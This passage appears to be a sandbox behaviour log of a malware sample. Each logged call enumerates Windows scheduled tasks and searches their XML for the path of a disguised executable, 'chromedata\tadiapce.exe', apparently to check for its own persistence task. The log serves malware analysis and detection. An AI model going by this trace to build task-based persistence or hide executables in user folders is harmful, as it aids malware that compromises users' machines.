<Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.564] IUnknown:Release (This=0x1690048) returned 0x0
	[0098.564] IUnknown:Release (This=0x63fea0) returned 0x0
	[0098.564] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea0) returned 0x0
	[0098.565] ITaskFolderCollection:get_Count (in: This=0x63fea0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.565] IUnknown:Release (This=0x63fea0) returned 0x0
	[0098.565] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.565] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x4, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.565] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0098.567] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0098.567] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0098.567] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="Proxy") returned 0x0
	[0098.567] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.569] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\acproxy.dll,-100)</Source>\r\n    <Author>$(@%systemroot%\\system32\\acproxy.dll,-101)</Author>\r\n    <Description>$(@%systemroot%\\system32\\acproxy.dll,-102)</Description>\r\n    <URI>Microsoft\\Windows\\Autochk\\Proxy</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger id=\"AutochkProxy\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT31536000S</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d acproxy.dll,PerformAutochkOperations</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.643] IUnknown:Release (This=0x63ff68) returned 0x0
	[0098.643] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.643] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0098.644] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.644] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.644] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.644] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x5, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.644] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0098.645] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0098.645] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0098.646] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="UninstallDeviceTask") returned 0x0
	[0098.646] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.648] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1002)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\BthUdTask.exe,-1001)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\Bluetooth\\UninstallDeviceTask</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>BthUdTask.exe</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.663] IUnknown:Release (This=0x63ff70) returned 0x0
	[0098.663] IUnknown:Release (This=0x63fe88) returned 0x0
	[0098.663] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0098.664] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.664] IUnknown:Release (This=0x63fe88) returned 0x0
	[0098.664] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.664] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x6, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.664] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea8) returned 0x0
	[0098.668] IRegisteredTaskCollection:get_Count (in: This=0x63fea8, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0098.668] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0098.668] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="SystemTask") returned 0x0
	[0098.668] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0098.671] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\SystemTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n                &lt;Query Id=\"0\" Path=\"System\"&gt;\r\n                    &lt;Select Path=\"System\"&gt;\r\n                        *[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]\r\n                    &lt;/Select&gt;\r\n                &lt;/Query&gt;\r\n                &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <BootTrigger>\r\n      <Delay>PT10S</Delay>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.705] IUnknown:Release (This=0x1690048) returned 0x0
	[0098.705] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0098.705] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="UserTask") returned 0x0
	[0098.705] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0098.707] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n    <LogonTrigger>\r\n      <Repetition>\r\n        <Interval>PT8H</Interval>\r\n      </Repetition>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[USER]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.739] IUnknown:Release (This=0x1690048) returned 0x0
	[0098.739] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0098.739] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="UserTask-Roam") returned 0x0
	[0098.739] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0098.742] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\dimsjob.dll,-100)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\dimsjob.dll,-101)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\dimsjob.dll,-102)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionLock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n    <SessionStateChangeTrigger>\r\n      <StateChange>SessionUnlock</StateChange>\r\n    </SessionStateChangeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"InteractiveUsers\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"InteractiveUsers\">\r\n    <ComHandler>\r\n      <ClassId>{58fb76b9-ac85-4e55-ac04-427593b1d060}</ClassId>\r\n      <Data><![CDATA[KEYROAMING]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.768] IUnknown:Release (This=0x1690048) returned 0x0
	[0098.768] IUnknown:Release (This=0x63fea8) returned 0x0
	[0098.768] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea8) returned 0x0
	[0098.769] ITaskFolderCollection:get_Count (in: This=0x63fea8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.769] IUnknown:Release (This=0x63fea8) returned 0x0
	[0098.769] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.769] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x7, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.769] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fec0) returned 0x0
	[0098.772] IRegisteredTaskCollection:get_Count (in: This=0x63fec0, pCount=0x128e30 | out: pCount=0x128e30*=3) returned 0x0
	[0098.772] IRegisteredTaskCollection:get_Item (in: This=0x63fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff60) returned 0x0
	[0098.772] IRegisteredTask:get_Name (in: This=0x63ff60, pName=0x128e3c | out: pName=0x128e3c*="Consolidator") returned 0x0
